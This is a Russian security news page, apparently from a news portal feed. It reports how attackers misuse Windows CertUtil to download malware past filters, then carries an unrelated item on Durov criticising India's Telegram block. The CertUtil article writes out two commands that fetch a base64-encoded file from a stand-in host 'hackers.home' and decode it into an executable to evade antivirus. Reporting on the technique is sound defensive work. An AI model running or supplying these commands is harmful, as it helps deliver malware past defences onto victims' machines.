CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

Эксперты в области безопасности обеспокоены использованием киберпреступниками встроенной в Windows программы CertUtil во вредоносных целях. CertUtil предназначена для управления сертификатами в Windows, с помощью этой программы вы можете устанавливать, создавать резервную копию, удалять и управлять хранилищами сертификатов в Windows.

Одной из особенностей CertUtil является возможность загрузить сертификат или любой другой файл по удаленному URL-адресу, сохранив его в виде локального файла. Для этого используется следующий синтаксис: «certutil.exe -urlcache -split -f [URL] output.file».

Еще в 2017 году исследователь Кейси Смит в Twitter выразил обеспокоенность тем, что этот метод можно использовать для загрузки вредоносных программ.

Опасения Смита подтвердились, так как недавно обнаруженный троян с марта этого года использует этот метод для загрузки различных пакетных файлов и сценариев на зараженный компьютер.

В качестве преимущества этого механизма загрузки вредоносных файлов эксперты называют возможность обойти различные фильтры, которые бы не позволили сделать это любой другой программе.

Ксавье Мертенс, консультант по вопросам безопасности, опубликовал свою версию использования CertUtil для загрузки злонамеренного содержимого. Чтобы параллельно обойти антивирусные сканеры, Мертенс предлагает кодировать файл при помощи base64, что позволит представить его как безобидный текст.

После загрузки текстового файла команда «certutil.exe -decode» может использоваться для декодирования файла в исполняемый:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

Более того, некоторые специалисты сообщают о том, что такой метод уже используется киберпреступными группами.

Дуров назвал ошибкой недельную блокировку Telegram в Индии

Основатель Telegram Павел Дуров прокомментировал решение властей Индии временно ограничить работу мессенджера из-за скандала с утечкой экзаменационных материалов. По словам Дурова, недельная блокировка Telegram ударила не по организаторам утечек, а по 150 миллионам обычных пользователей платформы в стране.

Поводом для ограничений стала история вокруг медицинского вступительного экзамена NEET.

Власти Индии отменили майское тестирование после того, как экзаменационные вопросы начали распространяться через Telegram. Повторный экзамен назначили на 21 июня, а работу мессенджера решили ограничить до 22 июня.

«Министерство информационных технологий Индии запретило Telegram на одну неделю, потому что некоторые пользователи делились утечкой экзаменационных вопросов. Это наказывает 150 миллионов обычных пользователей Telegram в Индии, а не инсайдеров, которые слили материалы», — заявил Дуров у себя в канале.

В индийском министерстве образования объяснили это борьбой с организованными группами, которые использовали Telegram для мошенничества и распространения утечек.

Однако Дуров утверждает, что блокировка не решила проблему. По его словам, после введения ограничений распространение материалов просто переместилось в другие приложения.

Глава Telegram также рассказал, что команда мессенджера в последние недели активно сотрудничала с индийскими властями и самостоятельно удаляла каналы, связанные с утечками экзаменационных заданий и мошенническими схемами.

Кроме того, Telegram сделал более заметной отметку о редактировании сообщений, чтобы усложнить манипуляции с датами публикаций задним числом.

«Telegram — это сила добра. Запрещать его, даже временно, — ошибка», — резюмировал Дуров.

RSS: Новости на портале Anti-Malware.ru